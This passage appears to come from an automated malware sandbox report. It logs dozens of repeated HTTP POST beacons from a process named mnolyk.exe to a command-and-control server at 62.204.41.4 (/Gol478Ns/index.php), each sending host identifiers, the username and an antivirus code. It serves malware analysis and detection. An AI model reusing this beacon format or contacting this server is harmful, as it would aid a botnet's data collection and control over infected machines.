                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      487 | 192.168.2.7 | 50215 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:10.750044107 CET | 947 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.813678980 CET | 947 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      488 | 192.168.2.7 | 50216 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:10.984164953 CET | 948 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.049561977 CET | 948 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      489 | 192.168.2.7 | 50217 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:11.221533060 CET | 949 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.286397934 CET | 949 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      49 | 192.168.2.7 | 49773 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:09.507797956 CET | 481 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.572981119 CET | 481 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      490 | 192.168.2.7 | 50218 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:11.455699921 CET | 950 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.520849943 CET | 950 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      491 | 192.168.2.7 | 50219 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:11.691916943 CET | 951 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.757682085 CET | 951 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      492 | 192.168.2.7 | 50220 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:11.948249102 CET | 952 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.012115955 CET | 952 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      493 | 192.168.2.7 | 50221 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:12.187047958 CET | 953 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.251094103 CET | 953 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      494 | 192.168.2.7 | 50222 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:12.425383091 CET | 954 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.489129066 CET | 954 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      495 | 192.168.2.7 | 50223 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:12.656455994 CET | 955 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.718499899 CET | 955 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      496 | 192.168.2.7 | 50224 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:12.894334078 CET | 956 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.959162951 CET | 956 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      497 | 192.168.2.7 | 50225 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:13.126471043 CET | 957 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.190808058 CET | 957 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      498 | 192.168.2.7 | 50226 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:13.375751972 CET | 958 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.441234112 CET | 958 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      499 | 192.168.2.7 | 50227 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:13.624630928 CET | 959 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.687376976 CET | 959 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      5 | 192.168.2.7 | 49729 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:57.348762989 CET | 437 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:57.413033962 CET | 437 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      50 | 192.168.2.7 | 49774 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:09.754519939 CET | 482 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.819736958 CET | 482 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      500 | 192.168.2.7 | 50228 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:13.886569023 CET | 960 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.951585054 CET | 960 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      501 | 192.168.2.7 | 50229 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:14.131855965 CET | 961 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.197653055 CET | 961 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      502 | 192.168.2.7 | 50230 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:14.375520945 CET | 962 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
